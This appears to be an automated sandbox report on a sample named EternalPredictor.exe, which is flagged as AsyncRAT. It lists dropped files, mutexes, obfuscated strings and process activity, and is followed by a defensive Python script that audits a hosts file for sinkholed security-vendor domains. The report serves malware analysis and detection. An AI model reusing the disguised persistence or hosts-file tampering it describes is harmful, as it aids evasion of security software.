Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C659800
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C671874
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C6680E4
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C6708C8
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C6740AC
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C662164
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C661944
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C6589E0
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C6639A4
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C66DA5C
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C65A2DB
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C661B50
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C662C10
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C673C10
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C675C00
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C65A474
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C676418
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C6708C8
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C65ACAD
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA4220350
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA4171950
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA4172270
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA4171300
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA43E1F40
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA43D11E0
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA43D1E20
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA60D5C00
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA6098720
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA609116D
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA6108870
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA60916FE
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA6091D93
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA6092702
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA609149C
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA6091CBC
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA6091B54
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA609117C8_2_00007FFBA609117C
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA6091A0F8_2_00007FFBA6091A0F
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA60926178_2_00007FFBA6092617
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA610AC808_2_00007FFBA610AC80
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA60C89208_2_00007FFBA60C8920
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA6091EE28_2_00007FFBA6091EE2
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA60916188_2_00007FFBA6091618
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA60921C68_2_00007FFBA60921C6
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA6091C128_2_00007FFBA6091C12
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66A54E88_2_00007FFBA66A54E8
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66A5CBC8_2_00007FFBA66A5CBC
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66AECC08_2_00007FFBA66AECC0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66ABF748_2_00007FFBA66ABF74
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66A87348_2_00007FFBA66A8734
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA66D1C008_2_00007FFBA66D1C00
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA67A92B08_2_00007FFBA67A92B0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA67B22508_2_00007FFBA67B2250
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA6814C708_2_00007FFBA6814C70
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA68077508_2_00007FFBA6807750
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA67F06C08_2_00007FFBA67F06C0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4A71D08_2_00007FFBAA4A71D0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4910918_2_00007FFBAA491091
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4910C08_2_00007FFBAA4910C0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA493E408_2_00007FFBAA493E40
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4B5F008_2_00007FFBAA4B5F00
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4B12B08_2_00007FFBAA4B12B0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4B8F608_2_00007FFBAA4B8F60
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4B2F808_2_00007FFBAA4B2F80
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4B73FC8_2_00007FFBAA4B73FC
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4B23B08_2_00007FFBAA4B23B0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4BF5348_2_00007FFBAA4BF534
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBAA4B19208_2_00007FFBAA4B1920
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 22_2_00007FFB4A13205922_2_00007FFB4A132059
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 22_2_00007FFB4A130E6822_2_00007FFB4A130E68
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 22_2_00007FFB4A13186D22_2_00007FFB4A13186D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 51_2_00007FFB4A123B9D51_2_00007FFB4A123B9D
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 91_2_00007FFB4A12205991_2_00007FFB4A122059
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 91_2_00007FFB4A120E6891_2_00007FFB4A120E68
                        Source: C:\Users\user\AppData\Roaming\XClient.exeCode function: 91_2_00007FFB4A12186D91_2_00007FFB4A12186D
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: String function: 00007FFBA66AEC88 appears 68 times
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: String function: 00007FFBA66AEB58 appears 49 times
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: String function: 00007FFBA610D341 appears 687 times
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: String function: 00007FFBAA499598 appears 326 times
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: String function: 00007FF72C652710 appears 104 times
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: String function: 00007FFBAA4994E8 appears 38 times
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: String function: 00007FFBA6091325 appears 298 times
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: String function: 00007FFBA610D32F appears 182 times
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: String function: 00007FF72C652910 appears 34 times
Source: EternalPredictor.exe, 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeternal.exe4 vs EternalPredictor.exe
Source: EternalPredictor.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Users\user\AppData\Roaming\program.exe | Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 3615
Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.EternalPredictor.exe.3d10cf0.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 2.0.eternal.exe.bc0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.EternalPredictor.exe.3d22330.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.1499082225.0000000000BC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\eternal.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: eternal.exe.0.dr, z7GL3GcSz0bU9xxBylPHvbaUX8.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: eternal.exe.0.dr, z7GL3GcSz0bU9xxBylPHvbaUX8.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: eternal.exe.0.dr, pwLyC8IGS9fWPw8AOOpq13VTDw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, z7GL3GcSz0bU9xxBylPHvbaUX8.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, z7GL3GcSz0bU9xxBylPHvbaUX8.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, pwLyC8IGS9fWPw8AOOpq13VTDw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, z7GL3GcSz0bU9xxBylPHvbaUX8.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, z7GL3GcSz0bU9xxBylPHvbaUX8.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, pwLyC8IGS9fWPw8AOOpq13VTDw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: eternal.exe.0.dr, ehFF3g5JMWmvPBY7f8PHXvmxPU1QBWGhSW9HZi8z2cL2PB9AU.cs | Base64 encoded string: 'zwUuG1nByTCEbaZKHWOAlu2mCDp7JUhoMorAGSUIUqs7jGnGSWfcL7nHRupmiUNZgDRBDBUz7hlO'
Source: eternal.exe.0.dr, OikC8q0jRtn3fHthyLWpHpUTg7BlI3UgPeim5M0jeam7kzrAn.cs | Base64 encoded string: 'nOPvjGtOiWrak5U6dMLaaYXnV5efRXgPksc1lS1MhJkqNd2g2hTJrZQwTI60OSsaRSVeV0APlUZT'
Source: eternal.exe.0.dr, fHfgyTqtDDXlgFY83FcOCVN0lmCsgZzHJUE3KRMC6.cs | Base64 encoded string: 'r9ZP2HoqHH770WDyWixlEX8ZRUYr87OFDSl4HtLk1VmHoDXC9z7gjvEpvEhFSKRin9IH', 'Yr6d8vHWsl1qg9CkWxf6ZUUnm0jR7Ke4Mfc2h4jChLnQgdVIMGjbfPrKphFxKxQHby6f', 'meCKLNBFqzdfahnjOzKN2HfHAYWoXX3kR875tED3tufBVEQEvOWeT72R871e8kvPOCp7', 't8tUYo6qF3AbbmaIzYNdk1tEW1YDNbUFN7MOTWhg89CaDB7M29qu4afdXBX3c9m8R74p', 'yOif5zu6batbtJMG78mjMggTXaUoZCMKTy1x4aM2XVeveuayD5ImGboaJ8MvCFi5Bzzl', 'hp5gyXDcXfr0IbLlGgN4BEoDIMeolWnxebvOOVVABA0hQ5FhBVeK5kTjAOFLkt2bpUb2'
Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, ehFF3g5JMWmvPBY7f8PHXvmxPU1QBWGhSW9HZi8z2cL2PB9AU.cs | Base64 encoded string: 'zwUuG1nByTCEbaZKHWOAlu2mCDp7JUhoMorAGSUIUqs7jGnGSWfcL7nHRupmiUNZgDRBDBUz7hlO'
Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, OikC8q0jRtn3fHthyLWpHpUTg7BlI3UgPeim5M0jeam7kzrAn.cs | Base64 encoded string: 'nOPvjGtOiWrak5U6dMLaaYXnV5efRXgPksc1lS1MhJkqNd2g2hTJrZQwTI60OSsaRSVeV0APlUZT'
Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, fHfgyTqtDDXlgFY83FcOCVN0lmCsgZzHJUE3KRMC6.cs | Base64 encoded string: 'r9ZP2HoqHH770WDyWixlEX8ZRUYr87OFDSl4HtLk1VmHoDXC9z7gjvEpvEhFSKRin9IH', 'Yr6d8vHWsl1qg9CkWxf6ZUUnm0jR7Ke4Mfc2h4jChLnQgdVIMGjbfPrKphFxKxQHby6f', 'meCKLNBFqzdfahnjOzKN2HfHAYWoXX3kR875tED3tufBVEQEvOWeT72R871e8kvPOCp7', 't8tUYo6qF3AbbmaIzYNdk1tEW1YDNbUFN7MOTWhg89CaDB7M29qu4afdXBX3c9m8R74p', 'yOif5zu6batbtJMG78mjMggTXaUoZCMKTy1x4aM2XVeveuayD5ImGboaJ8MvCFi5Bzzl', 'hp5gyXDcXfr0IbLlGgN4BEoDIMeolWnxebvOOVVABA0hQ5FhBVeK5kTjAOFLkt2bpUb2'
Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, ehFF3g5JMWmvPBY7f8PHXvmxPU1QBWGhSW9HZi8z2cL2PB9AU.cs | Base64 encoded string: 'zwUuG1nByTCEbaZKHWOAlu2mCDp7JUhoMorAGSUIUqs7jGnGSWfcL7nHRupmiUNZgDRBDBUz7hlO'
Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, OikC8q0jRtn3fHthyLWpHpUTg7BlI3UgPeim5M0jeam7kzrAn.cs | Base64 encoded string: 'nOPvjGtOiWrak5U6dMLaaYXnV5efRXgPksc1lS1MhJkqNd2g2hTJrZQwTI60OSsaRSVeV0APlUZT'
Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, fHfgyTqtDDXlgFY83FcOCVN0lmCsgZzHJUE3KRMC6.cs | Base64 encoded string: 'r9ZP2HoqHH770WDyWixlEX8ZRUYr87OFDSl4HtLk1VmHoDXC9z7gjvEpvEhFSKRin9IH', 'Yr6d8vHWsl1qg9CkWxf6ZUUnm0jR7Ke4Mfc2h4jChLnQgdVIMGjbfPrKphFxKxQHby6f', 'meCKLNBFqzdfahnjOzKN2HfHAYWoXX3kR875tED3tufBVEQEvOWeT72R871e8kvPOCp7', 't8tUYo6qF3AbbmaIzYNdk1tEW1YDNbUFN7MOTWhg89CaDB7M29qu4afdXBX3c9m8R74p', 'yOif5zu6batbtJMG78mjMggTXaUoZCMKTy1x4aM2XVeveuayD5ImGboaJ8MvCFi5Bzzl', 'hp5gyXDcXfr0IbLlGgN4BEoDIMeolWnxebvOOVVABA0hQ5FhBVeK5kTjAOFLkt2bpUb2'
Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: eternal.exe.0.dr, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: eternal.exe.0.dr, IsDp1ecpTFNA4aR1tkuj7x6jBnVeFOWVVQprEerK5JT5WDvVxJvOqcheXfyHjH2HvZRfEKvHfLNgLVkvs.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@170/58@5/4
Source: C:\Users\user\Desktop\EternalPredictor.exe | File created: C:\Users\user\AppData\Roaming\eternal.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4128:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Users\user\Desktop\EternalPredictor.exe | Mutant created: \Sessions\1\BaseNamedObjects\jONt95IbMc1ABmB7S
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3796:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:636:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7332:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3832:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
Source: C:\Users\user\AppData\Roaming\eternal.exe | Mutant created: \Sessions\1\BaseNamedObjects\Z7DjfJsbzoeA8FRF
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
Source: C:\Users\user\AppData\Roaming\program.exe | Mutant created: \Sessions\1\BaseNamedObjects\7
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\3575651c-bb47-448e-a514-22865732bbc
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Users\user\AppData\Roaming\eternal.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: EternalPredictor.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EternalPredictor.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\EternalPredictor.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\EternalPredictor.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Roaming\program.exe | File read: C:\Windows\System32\drivers\etc\hosts
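The two entries above that matter for response are the `REG QUERY ... Tcpip\Parameters /V DataBasePath` lookup and the read of `C:\Windows\System32\drivers\etc\hosts`: that is the standard way a stealer locates the hosts file before rewriting it so that security-vendor and update domains resolve to loopback. The report does not list which entries this sample writes. The script below is an added example, not part of the Joe Sandbox report and not the sample's code: it resolves the hosts file through the same DataBasePath value, parses it, and flags watched vendor domains that are sinkholed (mapped to 127.0.0.1, 0.0.0.0 or ::1) or redirected elsewhere. `SAMPLE_HOSTS` is constructed for illustration and `WATCHED_SUFFIXES` is an assumption to extend for your own estate.

```python
"""Audit a Windows hosts file for sinkholed or redirected security vendors.

Added example; not part of the Joe Sandbox report and not the sample's code.
The report shows the sample reading the Tcpip Parameters DataBasePath value and
the hosts file, but not the entries it writes, so SAMPLE_HOSTS is constructed.
"""
import ipaddress
import os
import re
import sys

# Assumption: suffixes stealers commonly sinkhole to block AV updates and lookups.
WATCHED_SUFFIXES = ("virustotal.com", "microsoft.com", "windowsupdate.com",
                    "avast.com", "kaspersky.com", "bitdefender.com", "malwarebytes.com")
SINKHOLE_ADDRS = {"127.0.0.1", "0.0.0.0", "::1"}
DEFAULT_NAMES = {"localhost"}  # shipped with Windows; never flagged

# Constructed sample (not captured from the sandbox run). Lines 1-3 resemble the
# stock file; lines 4-8 are the kinds of tampering the audit is meant to find.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#      127.0.0.1       localhost
127.0.0.1 localhost
0.0.0.0 virustotal.com www.virustotal.com
127.0.0.1 update.avast.com  # trailing comment is stripped
198.51.100.7 downloads.malwarebytes.com
10.0.0.5 dev.internal.example
127.0.0.1 myapp.local
"""


def hosts_path():
    """Resolve the hosts file the way the sample did: through DataBasePath."""
    try:
        import winreg  # Windows only
    except ImportError:
        return "/etc/hosts"  # non-Windows fallback so the script still runs
    key_path = r"SYSTEM\CurrentControlSet\Services\Tcpip\Parameters"
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
        base, _ = winreg.QueryValueEx(key, "DataBasePath")  # REG_EXPAND_SZ, unexpanded
    return os.path.join(os.path.expandvars(base), "hosts")


def parse_hosts(text):
    """Return (address, hostname, line_no) for every active mapping.

    Comments and blank lines are skipped and one line may map several names.
    Lines whose first token is not an IP address are ignored rather than raised
    on, because a tampered file is exactly where malformed lines turn up.
    """
    entries = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"\s+", line)
        try:
            addr = str(ipaddress.ip_address(parts[0]))  # normalises e.g. ::0001 -> ::1
        except ValueError:
            continue
        entries.extend((addr, name.lower(), line_no) for name in parts[1:])
    return entries


def audit_hosts(text):
    """Flag watched vendors that are sinkholed or redirected; loopback extras are low."""
    findings = []
    for addr, name, line_no in parse_hosts(text):
        if name in DEFAULT_NAMES:
            continue
        watched = any(name == s or name.endswith("." + s) for s in WATCHED_SUFFIXES)
        entry = {"line": line_no, "host": name, "addr": addr}
        if watched and addr in SINKHOLE_ADDRS:
            findings.append({**entry, "severity": "high", "reason": "security vendor sinkholed"})
        elif watched:
            findings.append({**entry, "severity": "high", "reason": "security vendor redirected"})
        elif addr in SINKHOLE_ADDRS:
            findings.append({**entry, "severity": "low", "reason": "non-default loopback mapping"})
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.argv[1] == "--live":
        with open(hosts_path(), encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_HOSTS
    for finding in audit_hosts(text):
        print(finding)
```

Run it with `--live` on the suspect host to audit the real file; without arguments it audits the constructed sample. A redirect to a routable address (the `198.51.100.7` line) is treated as seriously as a loopback sinkhole, since it lets the attacker serve fake update or lookup responses rather than merely blocking them.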
